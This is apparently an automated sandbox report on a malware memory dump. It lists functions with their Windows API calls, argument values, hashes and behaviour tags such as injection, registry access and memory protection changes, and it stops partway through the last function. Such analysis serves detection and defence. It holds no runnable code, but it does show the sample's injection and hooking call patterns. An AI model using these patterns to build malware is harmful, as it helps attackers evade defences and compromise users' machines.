Uniqueness Score: -1.00%

Function 033476B3, Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(0644B5B0,00000000,0000005C,?,?,?), ref: 033476EF
_strupr.NTDLL ref: 03347705
lstrlen.KERNEL32(0644B5B0,?,?), ref: 0334770D
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 0334778D
RtlAddVectoredExceptionHandler.NTDLL(00000000,03355123), ref: 033477B4
GetLastError.KERNEL32(?,?,?,?), ref: 033477CE
RtlRemoveVectoredExceptionHandler.NTDLL(032A05B8), ref: 033477E4

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
String ID:
API String ID: 2251957091-0
Opcode ID: 0e6b40fefa37af37fbc76168850c18b6aed6151afdbf768ac12f43451374bf20
Instruction ID: ce14dc1881f1a0c7077b97576bc435c017ec4da812986604609b006bac0fc33f
Opcode Fuzzy Hash: 0e6b40fefa37af37fbc76168850c18b6aed6151afdbf768ac12f43451374bf20
Instruction Fuzzy Hash: FA31BF77D002559FDB30EFB89DC497ABBECA708710F494525F932EB548D724A8448B90

Uniqueness

Uniqueness Score: -1.00%

Function 03350DD9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 03350E20
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 03350E33
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 03350E4F

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 03350E6C
memcpy.NTDLL(?,00000000,0000001C), ref: 03350E79
NtClose.NTDLL(?), ref: 03350E8B
NtClose.NTDLL(?), ref: 03350E95

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 6e2a4cefae71e41fd5dd631f2a61cbdc9b47c1ce57dd8c329d5808be1168f7ed
Instruction ID: 39ef36fe0e19a43bb52251d5fb76a8d277eb628a7d84a6eb680041ac35791ff8
Opcode Fuzzy Hash: 6e2a4cefae71e41fd5dd631f2a61cbdc9b47c1ce57dd8c329d5808be1168f7ed
Instruction Fuzzy Hash: 8621D676900218AFDB11EF95CC85DDEBFBDEF08740F108056F905E6160D7719A459FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0335420A, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 03354235
HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 03354242
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 033542CE
GetModuleHandleA.KERNEL32(00000000), ref: 033542D9
RtlImageNtHeader.NTDLL(00000000), ref: 033542E2
RtlExitUserThread.NTDLL(00000000), ref: 033542F7

Part of subcall function 03368815: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03354270,?), ref: 0336881D
Part of subcall function 03368815: GetVersion.KERNEL32 ref: 0336882C
Part of subcall function 03368815: GetCurrentProcessId.KERNEL32 ref: 03368848
Part of subcall function 03368815: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03368865

Part of subcall function 0334EAA2: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0334EB01

Part of subcall function 03348AB5: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,74E04DE0,00000000), ref: 03348ADB

Part of subcall function 0334407F: GetModuleHandleA.KERNEL32(?), ref: 033440A0
Part of subcall function 0334407F: GetProcAddress.KERNEL32(00000000,?), ref: 033440B9
Part of subcall function 0334407F: OpenProcess.KERNEL32(00000400,00000000,?), ref: 033440D6
Part of subcall function 0334407F: IsWow64Process.KERNEL32(?,?), ref: 033440E7
Part of subcall function 0334407F: CloseHandle.KERNEL32(?,?,?), ref: 033440FA

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Process$HandleModule$CreateFileOpenThreadTime$AddressCloseCurrentEventExitHeaderHeapImageInformationNameProcQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 3675227105-0
Opcode ID: 4e6064c0051a2ee32a08a9d529614ad9f8f8c4ff862257173a4ed9180b18b9a6
Instruction ID: 6be4f64460ae0a927dc03ed4dc5165aabc3b00f8326a192706b87735aa012970
Opcode Fuzzy Hash: 4e6064c0051a2ee32a08a9d529614ad9f8f8c4ff862257173a4ed9180b18b9a6
Instruction Fuzzy Hash: DC31A436D00628AFC725EFA6DCC4EAEBBACEB44754F148165F912EB644D7349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 033545D7, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000318), ref: 033545FC
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 03354618

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

Part of subcall function 0335D103: GetProcAddress.KERNEL32(?,00000000), ref: 0335D12C
Part of subcall function 0335D103: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03354659,00000000,00000000,00000028,00000100), ref: 0335D14E

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 03354782

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: 4ab912f59fff73e567925e57a8db30673026cce19af18275f91967b4e4abc7f8
Instruction ID: 3cb16abacc0b6736f0b58274d34ff433118d2f1f5a34c4fa947f9a74587b623e
Opcode Fuzzy Hash: 4ab912f59fff73e567925e57a8db30673026cce19af18275f91967b4e4abc7f8
Instruction Fuzzy Hash: E9611B75A00216ABDB19DFA5CCC0BAEBBB5FF09300F144559FD54AB241DB70EA94CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0334D5B8, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0334D5CC
GetProcAddress.KERNEL32(?), ref: 0334D5F4
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 0334D612

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: 48dd996394fa0f6d649f95f3e47c223667210aa146ef350a1c74ac0969b28da8
Instruction ID: 53ddd01992dc4bbaa575892c3150e2ee4cd591f75e79e9ba07320aaa67da804a
Opcode Fuzzy Hash: 48dd996394fa0f6d649f95f3e47c223667210aa146ef350a1c74ac0969b28da8
Instruction Fuzzy Hash: B411703AA00219AFEB10EB95DC85F997BFCEB44700F454024ED08EB291E774ED05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0335D103, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000000), ref: 0335D12C
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03354659,00000000,00000000,00000028,00000100), ref: 0335D14E

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: 649cd7a65382c2dcfe80459a82de3d89391422a9ac9dd69a4caddbbf6ab6a155
Instruction ID: 808d3d91098137c6f319498db7b32a57514c503d9e7e3e06756a4a4e3000b57b
Opcode Fuzzy Hash: 649cd7a65382c2dcfe80459a82de3d89391422a9ac9dd69a4caddbbf6ab6a155
Instruction Fuzzy Hash: 5DF0F97A900109BFCB21DF95DCC5C9ABBBDEB88310B144119F905C3224D631EA51EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0335F02A, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,03371460), ref: 0335F041

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: ba75dadc2e18f8f06b11268ba815f068c2f026ec78f900802daab477d1a88d55
Instruction ID: 9b3d571fba607579ec04564fa56b2dbfefc5ffc4243c4abb3043b6f446b32a8e
Opcode Fuzzy Hash: ba75dadc2e18f8f06b11268ba815f068c2f026ec78f900802daab477d1a88d55
Instruction Fuzzy Hash: A7F03472700125DFCB20EA69CCC4DABBBADEB05B95B088154FD05DB266E320E945CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 03346C25, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,?,0334B788,00000000,00000001,?,00000000,00000000,00000000,03370964,00000001), ref: 03346C73
VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,00000000,?,0334B788,00000000,00000001,?,00000000,00000000,00000000,03370964,00000001), ref: 03346C85
lstrcpy.KERNEL32(00000000,?), ref: 03346C94
VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,00000000,?,0334B788,00000000,00000001,?,00000000,00000000,00000000,03370964,00000001), ref: 03346CA5
VirtualProtect.KERNEL32(?,00000005,00000040,00000400,0336D510,00000018,0334614C,?,00000000,?,0334B788,00000000,00000001,?,00000000,00000000), ref: 03346CDC
VirtualProtect.KERNEL32(?,00000004,?,?,?,00000000,?,0334B788,00000000,00000001,?,00000000,00000000,00000000,03370964,00000001), ref: 03346CF7
VirtualProtect.KERNEL32(?,00000004,00000040,?,0336D510,00000018,0334614C,?,00000000,?,0334B788,00000000,00000001,?,00000000,00000000), ref: 03346D0C
VirtualProtect.KERNEL32(?,00000004,00000040,?,0336D510,00000018,0334614C,?,00000000,?,0334B788,00000000,00000001,?,00000000,00000000), ref: 03346D39
VirtualProtect.KERNEL32(?,00000004,?,?,?,00000000,?,0334B788,00000000,00000001,?,00000000,00000000,00000000,03370964,00000001), ref: 03346D53
GetLastError.KERNEL32(?,00000000,?,0334B788,00000000,00000001,?,00000000,00000000,00000000,03370964,00000001), ref: 03346D5A

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: 57120bbaab9d2ca9654aae85f84f7c946a96c0923cc4af620ffe89e5cbeaffd5
Instruction ID: e6c4dd505bff7b28ad815fff3327ee839c76390744ca02829c85f56cd8b7a408
Opcode Fuzzy Hash: 57120bbaab9d2ca9654aae85f84f7c946a96c0923cc4af620ffe89e5cbeaffd5
Instruction Fuzzy Hash: FB413DB1900709AFDB31DF65CC85EAABBF9FB09310F048529E656A65A4D734F815CF20

Uniqueness

Uniqueness Score: -1.00%

Function 0334D814, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 033545D7: GetProcAddress.KERNEL32(?,00000318), ref: 033545FC
Part of subcall function 033545D7: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 03354618

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0334D84D
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0334D938

Part of subcall function 033545D7: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 03354782

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0334D883
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0334D88F
lstrcmpi.KERNEL32(?,00000000), ref: 0334D8CC
StrChrA.SHLWAPI(?,0000002E), ref: 0334D8D5
lstrcmpi.KERNEL32(?,00000000), ref: 0334D8E7

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: d430a940d3e043ca89a966100c4e98ca5b6a324e66699ba196e6083d8ce287cf
Instruction ID: 4533f42f1dcf6b7f3b230f9c5c783bdebf9af53b02a1244824c55e3001a4701d
Opcode Fuzzy Hash: d430a940d3e043ca89a966100c4e98ca5b6a324e66699ba196e6083d8ce287cf
Instruction Fuzzy Hash: B7316B75508315ABD321DF21DC80B2BBBE8FF88B55F150918F988A7281D734E904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 033666CF, Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 03350A77: memset.NTDLL ref: 03350A81

OpenEventA.KERNEL32(00000002,00000000,03371354,?,00000000,00000000,?,0334B0CC,?,?,?,?,?,?,?,033477C7), ref: 03366769
SetEvent.KERNEL32(00000000,?,0334B0CC,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03366776
Sleep.KERNEL32(00000BB8,?,0334B0CC,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03366781
ResetEvent.KERNEL32(00000000,?,0334B0CC,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03366788
CloseHandle.KERNEL32(00000000,?,0334B0CC,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0336678F
GetShellWindow.USER32 ref: 0336679A
GetWindowThreadProcessId.USER32(00000000), ref: 033667A1

Part of subcall function 03343F26: RegCloseKey.ADVAPI32(?,?,?), ref: 03343FA9

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
String ID:
API String ID: 53838381-0
Opcode ID: b0c133fd169a100e60008b42babb143b719b462b52acabb753b89aa4329fb19c
Instruction ID: 087d39a1ea5d0bdf892b54a01639746283c4bd9db7c43b24a09bbd1c56bd63cb
Opcode Fuzzy Hash: b0c133fd169a100e60008b42babb143b719b462b52acabb753b89aa4329fb19c
Instruction Fuzzy Hash: 5521713BA00214AFD221FB66ACC9E6BBB6DEBC9B51F18C104F5199B14CEB3558018B61

Uniqueness

Uniqueness Score: -1.00%

Function 0335F8B8, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0335F8DB

Part of subcall function 0334407F: GetModuleHandleA.KERNEL32(?), ref: 033440A0
Part of subcall function 0334407F: GetProcAddress.KERNEL32(00000000,?), ref: 033440B9
Part of subcall function 0334407F: OpenProcess.KERNEL32(00000400,00000000,?), ref: 033440D6
Part of subcall function 0334407F: IsWow64Process.KERNEL32(?,?), ref: 033440E7
Part of subcall function 0334407F: CloseHandle.KERNEL32(?,?,?), ref: 033440FA

ResumeThread.KERNEL32(?,?,00000000,00000000,00000004,?,00000000,74E04EE0,00000000), ref: 0335F995
WaitForSingleObject.KERNEL32(00000064), ref: 0335F9A3
SuspendThread.KERNEL32(?), ref: 0335F9B6

Part of subcall function 0335C0B6: memset.NTDLL ref: 0335C380

ResumeThread.KERNEL32(?), ref: 0335FA39

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSingleSuspendWaitWow64
String ID:
API String ID: 223543837-0
Opcode ID: 94f1a652bb6822c5b314a933a2f3435f11d33693fa321c88afd076f843d16a8a
Instruction ID: ff3b91357554bcda8709ebda9d9b17e2870a1b3541d317eb0ce9c637e8c0dd22
Opcode Fuzzy Hash: 94f1a652bb6822c5b314a933a2f3435f11d33693fa321c88afd076f843d16a8a
Instruction Fuzzy Hash: 67415772A00209EFDB21EFA5CCC4EAEBBB9AB04704F188465FD45AB150DB35DA518F51

Uniqueness

Uniqueness Score: -1.00%

Function 03367862, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0335A538,?,?,00000402,0335A538,0336D590,00000018,03358D57,?,00000402,033707F4,033707F0,-0000000C,00000000), ref: 033678A5
VirtualProtect.KERNEL32(00000000,00000004,0335A538,0335A538,00000000,00000004,0335A538,033707F4,0335A538,?,?,00000402,0335A538,0336D590,00000018,03358D57), ref: 03367930
RtlEnterCriticalSection.NTDLL(03371460), ref: 03367959
RtlLeaveCriticalSection.NTDLL(03371460), ref: 03367977

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: aa5889e914e7bb4ece622d8b9bf0c4e5c200e062ccab0780a302367d451c85a8
Instruction ID: 34b388d11c24c0e8be9e0fa27af9605570759099bfc308cf7302a1b8fc5d7b3a
Opcode Fuzzy Hash: aa5889e914e7bb4ece622d8b9bf0c4e5c200e062ccab0780a302367d451c85a8
Instruction Fuzzy Hash: 51413A75900705AFCB11EF66C8C4A9EFBF9FF08314B14855AE816DB218D774A951CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0334B6A7, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,03368A07), ref: 0334B6BE
QueueUserAPC.KERNEL32(?,00000000,?), ref: 0334B6D3
GetLastError.KERNEL32(00000000), ref: 0334B6DE
TerminateThread.KERNEL32(00000000,00000000), ref: 0334B6E8
CloseHandle.KERNEL32(00000000), ref: 0334B6EF
SetLastError.KERNEL32(00000000), ref: 0334B6F8

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 90616a9e77004490852b06d7e028e26ac514c0a7a56bc47164c47ac001ebcb22
Instruction ID: 86572d7429fe7d92f200b9e0cf4a5757aa51c20bff1c66517c9c1d69659c0599
Opcode Fuzzy Hash: 90616a9e77004490852b06d7e028e26ac514c0a7a56bc47164c47ac001ebcb22
Instruction Fuzzy Hash: 5DF08C32209621BFD7226FA2ACC8F5BFF6CFB09751F048408F642D0158DB7888108FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0335889B, Relevance: 7.6, APIs: 5, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03355B86: VirtualProtect.KERNEL32(0335A538,?,00000040,?,033707F4,?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000), ref: 03355BAB
Part of subcall function 03355B86: GetLastError.KERNEL32(?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000,?), ref: 03355BB3
Part of subcall function 03355B86: VirtualQuery.KERNEL32(0335A538,033707F4,0000001C,?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000,?), ref: 03355BCA
Part of subcall function 03355B86: VirtualProtect.KERNEL32(0335A538,?,-2C9B417C,?,?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000,?), ref: 03355BEF

GetLastError.KERNEL32(00000000,00000004,03358D1F,?,810C74C3,00000000,?,0336D580,0000001C,0334B898,00000002,0335A538,00000001,0000000C,033707F0,0000000C), ref: 033589F6

Part of subcall function 0335D85B: lstrlen.KERNEL32(0337065C,033707F4,00000402,033707F4), ref: 0335D893
Part of subcall function 0335D85B: lstrcpy.KERNEL32(00000000,0337065C), ref: 0335D8AA
Part of subcall function 0335D85B: StrChrA.SHLWAPI(00000000,0000002E), ref: 0335D8B3
Part of subcall function 0335D85B: GetModuleHandleA.KERNEL32(00000000), ref: 0335D8D1

VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,0335A538,?,0337065C,0335A538,?,00000000,00000004,03358D1F,?,810C74C3), ref: 03358973
VirtualProtect.KERNEL32(033707F4,00000004,03358D1F,03358D1F,0335A538,?,00000000,00000004,03358D1F,?,810C74C3,00000000,?,0336D580,0000001C,0334B898), ref: 0335898E
RtlEnterCriticalSection.NTDLL(03371460), ref: 033589B3
RtlLeaveCriticalSection.NTDLL(03371460), ref: 033589D1

Part of subcall function 03355B86: SetLastError.KERNEL32(0000000C,?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000,?), ref: 03355BF8

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-0
Opcode ID: 782fce230d84b89eae3f2d55ef12862e819738bc79ff98c7cdbbc9b9d9c87a3f
Instruction ID: 753e2dff5982663f7c8f9622bde1e9ef8ace6e04deda1b09765d669e0f12873b
Opcode Fuzzy Hash: 782fce230d84b89eae3f2d55ef12862e819738bc79ff98c7cdbbc9b9d9c87a3f
Instruction Fuzzy Hash: E341387590060AAFDB10DF65C888AADBBB8FF08310F048119F955AB254D734A950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03344C22, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0334B8B7: RegCreateKeyA.ADVAPI32(80000001,0644B7F0,?), ref: 0334B8CC
Part of subcall function 0334B8B7: lstrlen.KERNEL32(0644B7F0,00000000,00000000,00000000,?,?,?,03344C3E,00000000,?,7673D3B0,74E05520,?,?,?,03341F86), ref: 0334B8F5

RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,03341F86,?), ref: 03344C5A
RtlAllocateHeap.NTDLL(00000000,?), ref: 03344C6E
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,03341F86,?,?,?), ref: 03344C88
HeapFree.KERNEL32(00000000,?,?,?,?,03341F86,?,?,?), ref: 03344CA4
RegCloseKey.ADVAPI32(?,?,?,?,03341F86,?,?,?), ref: 03344CB2

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: 8fc706e73b05828dfa79b6f52a786b68a4966028ba941eddb5ff88ebef3526fb
Instruction ID: 91a70772bcee53189dac7bc154aad72fa077ab4abb7eb2c9a449ac21cad19c23
Opcode Fuzzy Hash: 8fc706e73b05828dfa79b6f52a786b68a4966028ba941eddb5ff88ebef3526fb
Instruction Fuzzy Hash: 43118BB6500149FFDB11AF96CCC4DAE7BBEEB88344B08443AF901A3110D731AE509F60

Uniqueness

Uniqueness Score: -1.00%

Function 03355B86, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(0335A538,?,00000040,?,033707F4,?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000), ref: 03355BAB
GetLastError.KERNEL32(?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000,?), ref: 03355BB3
VirtualQuery.KERNEL32(0335A538,033707F4,0000001C,?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000,?), ref: 03355BCA
VirtualProtect.KERNEL32(0335A538,?,-2C9B417C,?,?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000,?), ref: 03355BEF
SetLastError.KERNEL32(0000000C,?,00000000,033707F4,033707F0,-0000000C,00000000,?,?,0335A538,0000000C,00000000,?), ref: 03355BF8

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: 5860812bac805f1f1d20bdae67e49608ac70460b179166472a3285421a1915b1
Instruction ID: ae7bcf81d21c520b96224715919a295927023e313781468f00b291ee83e1c1c7
Opcode Fuzzy Hash: 5860812bac805f1f1d20bdae67e49608ac70460b179166472a3285421a1915b1
Instruction Fuzzy Hash: 8B01E97250020DBFEB11AFD6DC88CAABBBDEF09350B058026F942D6124D771EA54DF64

Uniqueness

Uniqueness Score: -1.00%

Function 0334DB7C, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0334DBAA
ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0334DC34
WaitForSingleObject.KERNEL32(00000064), ref: 0334DC42
SuspendThread.KERNEL32(?), ref: 0334DC55

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: d097d688950234b8ee37bdca2615f6e33aa4e2a4a1595d1710763952c5caa440
Instruction ID: 4e36fe8273095ade5a57155f24d5b6e1b783b63a2cecf36246980e74a187fe3d
Opcode Fuzzy Hash: d097d688950234b8ee37bdca2615f6e33aa4e2a4a1595d1710763952c5caa440
Instruction Fuzzy Hash: EE415971508341AFE721EF60CC80E6BBBE9FF88314F04892DFA9586164D771E9548B62

Uniqueness

Uniqueness Score: -1.00%

Function 033581D2, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(0334B0CC,?,00000000,0334B0CC,00000000,0334B0DC,0334B0CC,?,?,?,?,033609A6,80000001,?,0334B0CC,0334B0DC), ref: 033581F7
RtlAllocateHeap.NTDLL(00000000,0334B0DC,00000000), ref: 0335820E
HeapFree.KERNEL32(00000000,00000000,?,033609A6,80000001,?,0334B0CC,0334B0DC,?,03350A99,80000001,?,0334B0CC), ref: 03358229
RegQueryValueExA.KERNEL32(0334B0CC,?,00000000,0334B0CC,00000000,0334B0DC,?,033609A6,80000001,?,0334B0CC,0334B0DC,?,03350A99,80000001), ref: 03358248

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: 0aad349b8e3236351fc5d5cb7d502d5d1cf23191e7fefbc1c06c84493258770a
Instruction ID: 152c371033ee61b3ff07cbd6f33c1abc7e81606796b3bb0ab7f19106ecd6a9ff
Opcode Fuzzy Hash: 0aad349b8e3236351fc5d5cb7d502d5d1cf23191e7fefbc1c06c84493258770a
Instruction Fuzzy Hash: E711F5B6A00518FFDB22DF99DC84CEEBFBDEB89750F104166F901AA210D6719E40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03351664, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,033711D0,00000000,0335A9D4,?,03348BC2,?), ref: 03351683
PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,033711D0,00000000,0335A9D4,?,03348BC2,?), ref: 0335168E
_wcsupr.NTDLL ref: 0335169B
lstrlenW.KERNEL32(00000000), ref: 033516A3

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: d2dfe62ae2be6ce572657af3b65936ff2a2b798a92058200fb88fd3836f370f1
Instruction ID: 0cf53d47498949aabbe00f716314e0ee437bd58f3e935f8228776111f6e9220e
Opcode Fuzzy Hash: d2dfe62ae2be6ce572657af3b65936ff2a2b798a92058200fb88fd3836f370f1
Instruction Fuzzy Hash: 75F0B436A062116FD722EAB55CC8FAF96ECAF81759B184539FD01D9158CF64CC018664

Uniqueness

Uniqueness Score: -1.00%

Function 0336092A, Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03344375: lstrlen.KERNEL32(?,00000000,?,00000027), ref: 033443AB
Part of subcall function 03344375: lstrcpy.KERNEL32(00000000,00000000), ref: 033443CF
